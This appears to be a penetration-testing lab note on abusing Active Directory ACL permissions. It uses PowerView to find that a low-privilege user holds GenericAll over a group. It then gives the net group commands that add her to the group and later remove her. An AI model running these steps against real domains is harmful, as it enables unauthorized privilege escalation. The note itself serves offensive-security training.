Active Directory is a hierarchical database that contains Active Directory Objects. There include: users, computers, applications, printers and shared folders
Recap
When a user tries to access an Active Directory Object it sends it's access token, which consists of user identity and permissions. The target object then checks the access token against a list of known permissions (Access Control List). If the user is in the ACL, access is granted.
Permissions
Active Directory has a wealth of permissions, but from an attacker standpoint we are focused on the following:
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group
Enumerating ACE's - PowerView
Access Control Entries (ACE) make up the Access Control Lists, they are themselves an Active Directory Object. We can query them with PowerView.
PS C:\Tools> Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553
CORP\RAS and IAS Servers
Converting All SID's from an Object- PowerView
Above we fetched all SID's for a user, this can be tedious. Instead let's fetch all SID's for a AD Object. We will query "Management Department" with "GerericAll" Permissions.
PS C:\Tools> "S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName
CORP\Domain Admins
CORP\stephanie
BUILTIN\Account Operators
Local System
CORP\Enterprise Admins
NOTE: We see that stephanie has "GenericAll" permissions for this Object, a low-level user should not have these types of permissions so it must be a configuration mistake!
GenericAll** _is the most powerfull ACL in Active Directory.**_
Exploiting Vulnerability
Adding New User
Above we discovered a misconfiguration in the "Management Department" AD Object, but there's only one user that has access: Jen. We can use stephanies permissions to add herself to the Group.
PS C:\Tools> net group "Management Department" stephanie /add /domain
The request will be processed at a domain controller for domain corp.com.
The command completed successfully.
Verify
We can verify that stephanie was indeed added with PowerView, alternatively net.exe will work.
PS C:\Tools> Get-NetGroup "Management Department" | select member
member
------
{CN=jen,CN=Users,DC=corp,DC=com, CN=stephanie,CN=Users,DC=corp,DC=com}
Cleanup
After we're done doing our business we always want to cleanup. Let's delete Stephanie from the Group.
PS C:\Tools> net group "Management Department" stephanie /del /domain
The request will be processed at a domain controller for domain corp.com.
The command completed successfully.